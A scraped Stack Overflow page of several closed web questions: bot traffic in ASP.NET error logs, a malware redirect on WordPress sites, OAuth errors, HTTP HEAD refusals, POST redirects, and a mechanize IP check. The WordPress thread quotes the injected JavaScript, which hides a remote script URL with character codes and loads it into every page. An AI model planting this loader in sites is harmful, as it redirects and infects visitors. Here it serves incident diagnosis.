Hackers are trying to do something on one of our site [closed] - asp.net

Closed. This question is off-topic. It is not currently accepting answers.
Want to improve this question? Update the question so it's on-topic for Stack Overflow.
Closed 11 years ago.
Improve this question
One of our site recently received a lots of attack which all seems similar. By chance, we have a error logging framework which send us error log email when something strange happen or an error raised on the server.
Here is what happen :
Error : The file '/(A(u76U7llazAEkAAAAZTJmYmE1NmMtZTE4YS00YzQ2LTlmYzItNGIxMzZjMzNjOTc4vkp-I-8cYbLrHx25-IfNdMvuKao1))/MostOfOurPublicPage.aspx' does not exist.
Request:
URL: http://Ourwebsite.com/(A(u76U7llazAEkAAAAZTJmYmE1NmMtZTE4YS00YzQ2LTlmYzItNGIxMzZjMzNjOTc4vkp-I-8cYbLrHx25-IfNdMvuKao1))/MostOfOurPublicPage.aspx
User Agent: Mozilla/5.0 (compatible; SiteBot/0.1; +http://www.sitebot.org/robot/)
Referrer:
Host: 213.186.122.2 (Ukraine)
SecuredConnection: False
User-agent shows SiteBot/0.1 but I'm preaty sure its not ... at least I never heard anything about sitebots doing things like that.
Question
So, anyone have any idea of what the heck is that and what can I do to prevent this things because it make our error logging framework sending us something like 100 error logs a day!
Note : I usualy talk french so sorry for my english.

This is just a search bot or crawler. Place a robots.txt file on your web server root (http://www.example.com/robots.txt) and put the text below in it.
user-agent: sitebot
disallow: /
That should keep it away.
Also the strange url it uses, is just a session cookie passed by a url string, instead of a cookie.

These types of issues seem to crop up from time to time. You probably don't want to fully suppress these types of errors as they can be helpful from time to time to determine bad links. What I have done in the past is filter out bot traffic.
either block the traffic at your firewall
filter the bot traffic.

Related

WordPress Malware - Redirect to (fast.destinyfernandi.com) - even after scan and clean [closed]

Closed. This question does not meet Stack Overflow guidelines. It is not currently accepting answers.
This question does not appear to be about a specific programming problem, a software algorithm, or software tools primarily used by programmers. If you believe the question would be on-topic on another Stack Exchange site, you can leave a comment to explain where the question may be able to be answered.
Closed 2 years ago.
Improve this question
I'm living my worse nightmare. I have an CentOS server, that is hosting 10s of WordPress website.
My clients notice that their websites are opening and after loading it is redirected to (fast.destinyfernandi.com) <---- Malware website.
I used ClamAV to detect the malware and clean them manually, without any success.
Here is the example of the Clamscan command result of one of the website:
----------- SCAN SUMMARY -----------
Known viruses: 6938202
Engine version: 0.101.5
Scanned directories: 2300
Scanned files: 91116
Infected files: 0
Data scanned: 4588.75 MB
Data read: 24121.63 MB (ratio 0.19:1)
Time: 1705.569 sec (28 m 25 s)
But this site is still redirecting to that malware website.
Have anyone came across such an issue?
Please help.
==================================Solved:=============================
The code was injected to all js files
var hglgfdrr4634hezfdg = 1; var d=document;var s=d.createElement('script'); s.type='text/javascript'; s.async=true;
var pl = String.fromCharCode(104,116,116,112,115,58,47,47,116,111,109,46,118,101,114,121,98,101,97,116,105,102,117,108,97,110,116,111,110,121,46,99,111,109,47,97,46,106,115); s.src=pl;
if (document.currentScript) {
document.currentScript.parentNode.insertBefore(s, document.currentScript);
} else {
d.getElementsByTagName('head')[0].appendChild(s);
}
There are several ways how your web resource could be redirected to destinyfernandi.
database could be patched and your own ligitimate code does
redirect
some injected code in php or JS or html templates does
redirect either via window.location or meta or headers of response.
First discover what address you gets redirected to , whether it is destinyfernandi or some other URL.
I mean you could be redirected to some "invisible" URL1 and server which servicing URL1 would redirect browser further to destinyfernandi.
Once you discover what is the first hop (URL) in redirects you can search for bad URL in source code and database dump.
There is also a chance that first hop URL ( most likely destinyfernandi) is obfuscated in your code but lets hope it is not the case.
You can also add break point which fires on redirects which could help you to identify obfuscated piece of JS code:
window.addEventListener("beforeunload", function() { debugger; }, false)

Why I have an error performing password flow when I login? [closed]

Closed. This question needs debugging details. It is not currently accepting answers.
Edit the question to include desired behavior, a specific problem or error, and the shortest code necessary to reproduce the problem. This will help others answer the question.
Closed 2 years ago.
Improve this question
When trying to login my browser generates an error saying "An error has occurred" and if I inspect it shows something like this:
How can I resolve this?
It seems like your Token Endpoint is configured to use a different Authentication Method. There is an error shown invalid_client, it looks like you're using password flow to authenticate but your token endpoint expects another grant type
That 400 error means that the server was unable to process the request sent by your application due to invalid syntax. Perhaps something invalid with your authentication token sent. Very hard to tell with so little information.

Why would a server disallow HTTP HEAD? [closed]

Closed. This question does not meet Stack Overflow guidelines. It is not currently accepting answers.
This question does not appear to be about programming within the scope defined in the help center.
Closed 12 months ago.
Improve this question
I found out that there are servers that respond with HTTP 405 to HEAD requests (or another status code including 404 which is confusing IMO, but that's not important now) even though GET requests are responded with HTTP 200. HTTP 405 is defined as...
405 Method Not Allowed
The method specified in the Request-Line is not allowed for the
resource identified by the Request-URI. The response MUST include an
Allow header containing a list of valid methods for the requested
resource.
Alright, I looked at the Allow header and found out that I can use GET to get the resource (even though I only wanted to find out whether the resource exists). Problem solved.
However, my question is... Why would a server disallow the HEAD method? What is the advantage? Are there possible security reasons?
I think it is because they're getting a log full of "the requested resource can only be accessed via SSL" errors when their HTTPS-only site gets tons of HEAD requests via HTTP. I think they're conflating "method" with "protocol" and so thinking the 405 makes sense.
See this post for an example of someone asking about the issue and being told to give a 405.

send xml file via HTTP Post redirect to another server [closed]

Closed. This question does not meet Stack Overflow guidelines. It is not currently accepting answers.
Questions asking for code must demonstrate a minimal understanding of the problem being solved. Include attempted solutions, why they didn't work, and the expected results. See also: Stack Overflow question checklist
Closed 9 years ago.
Improve this question
After receiving a post request in servlet, I have to do a redirection to another server and at the same time I have to pass an xml file in the redirection request.
For example, I have to do a redirection from my servlet to "http://www.abc.com" and pass an xml file in the request.
I tried the following, but it didn't work.
response.sendRedirect - it is creating only get requests, so not able to send xml
HttpClient or URLConnection - it is creating a new request, not doing the actual redirection
Intermediate jsp - forwarded the request to a intermediate jsp and did a submit from jsp.
It is sending the xml in parameter and not in InputStream
Please let me know how to achieve this.
A redirect (either HTTP or HTML) can only operate on a URL, rather than a form submission, which offers built in support for uploading files via the "multipart/form-data" form encoding, and so you would have to encode your file within the URL itself, which would severely limit you given that the lowest-common-denominator (Internet Explorer) URL maximum length is around 2000 characters. If your files are smaller than that, then you could encode your file as a URL query parameter. Otherwise, it's probably not possible, but I will stand corrected if others know of a way to achieve it.

why does the website know i am using a bot to check my ip [closed]

Closed. This question needs to be more focused. It is not currently accepting answers.
Want to improve this question? Update the question so it focuses on one problem only by editing this post.
Closed 8 years ago.
Improve this question
I use mechanize to create a virtual browser
br = mechanize.Browser()
# set cookies
cookies = cookielib.LWPCookieJar()
br.set_cookiejar(cookies)
# browser settings (used to emulate a browser)
br.set_handle_equiv(True)
br.set_handle_redirect(True)
br.set_handle_referer(True)
br.set_handle_robots(False)
br.set_debug_http(False)
br.set_debug_responses(False)
br.set_debug_redirects(False)
br.set_handle_refresh(mechanize.HTTPRefreshProcessor(), max_time=1)
br.addheaders = [('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')]
br.open("http://www.whatsmyip.org/")
Although the website returm my ip, they give a notice
Please DO NOT program a bot to use this site to grab your IPs. It kills my server and thats not nice. Just get some cheap or free web hosting and make your own IP-only page to power your bot. Then you won't even have to parse any html, just load the IP directly - better for everyone!!
Why does the website know that?
Do I miss something in my code?
I tested your code, it all works fine.
Do you mean this part:
<!--
Please DO NOT program a bot to use this site to grab your IPs. It kills my server and thats not nice.
Just get some cheap or free web hosting and make your own IP-only page to power your bot.
Then you won't even have to parse any html, just load the IP directly - better for everyone!!
-->
If yes, than it's just comment tag, that is used just to remind users not to use the website with bots.
It doesn't "catch" you or anything. If you will go to the whatsmyip page and open the souse code you will see that it starts on the line 24 (even if you open it in the browser).
So all in all it's just a warning that wed-developers putter inside the HTML

Resources